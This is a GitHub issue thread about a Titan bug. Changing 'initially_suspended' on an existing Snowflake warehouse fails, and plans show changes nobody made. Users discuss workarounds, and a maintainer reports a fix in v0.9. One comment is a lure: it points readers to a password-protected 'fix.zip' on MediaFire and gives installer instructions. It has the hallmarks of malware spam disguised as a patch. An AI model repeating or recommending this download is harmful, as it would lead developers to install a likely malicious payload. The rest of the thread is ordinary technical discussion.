### ISSUE TITLE
BUG: Can't alter parameter initially_suspended after warehouse creation. 

### ISSUE THREAD

**Issue by aleenprd** [Titan-Systems/titan#99]
`invalid property 'initially_suspended' for 'WAREHOUSE'
`
`snowflake.connector.errors.ProgrammingError: 001420: failed to execute sql, [ALTER WAREHOUSE TITAN_TEST_WH SET initially_suspended = True]`

Also, why would titan want to modify this warehouse since it was already created in the previous apply, and I didn't change anything on it?
`
SHOW PARAMETERS FOR WAREHOUSE TITAN_TEST_WH    (3 rows, 0.12s)`

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by neehhaa06** [comment]
Hello @aleenprd :)

```
Remove **initially_suspended** from the configuration for existing warehouses.
Use **SUSPEND** or **RESUME** to control warehouse state after creation.
```

**Comment by aleenprd** [comment]
@neehhaa06 as a suggestion, I think Titan should have the following workflow. If warehouse exists, exclude initially_suspended parameter. That's point 1. Point number 2 is: why does it want to alter the existing warehouse when I didn't modify its resource definition in the first place? This seems like a bug to me.

**Comment by neehhaa06** [comment]
Hello @aleenprd 

To resolve the issue, first, update Titan’s workflow to exclude the `initially_suspended` parameter when modifying existing warehouses, as this parameter is only applicable during warehouse creation. Next, investigate why Titan is attempting to alter the warehouse configuration despite no changes being made to its resource definition, as this behavior may indicate a bug or misconfiguration in Titan’s update process.

**Comment by aleenprd** [comment]
@neehhaa06 what configuration can I check precisely? There are no logs to check for debugging purposes, as far as I can tell. And there is no configuration for the blueprint other than run_mode which is set to create-or-update. 

This is my existing warehouse:
![image](https://github.com/user-attachments/assets/97aaac68-5e17-4159-ad3d-f71ea92453a7)
And these are the logs from the plan:
```
~ urn::JF91634:warehouse/TITAN_TEST_WH {
  ~ query_acceleration_max_scale_factor = None -> 1
}

~ urn::JF91634:warehouse/TITAN_TEST_WH {
  ~ scaling_policy = None -> "STANDARD"
}

~ urn::JF91634:warehouse/TITAN_TEST_WH {
  ~ min_cluster_count = None -> 1
}

~ urn::JF91634:warehouse/TITAN_TEST_WH {
  ~ max_cluster_count = None -> 1
}
```
However, if I also run `SHOW PARAMETERS FOR WAREHOUSE TITAN_TEST_WH;` we can only see:
![image](https://github.com/user-attachments/assets/4878774c-8ea3-4559-a4f9-f3438e91fa44)
which is probably not sufficient for Titan to know what the actual rest of the parameters of the warehouse are.

**Comment by teej** [comment]
Fixed in [v0.9](https://github.com/Titan-Systems/titan/releases/tag/v0.9.1).
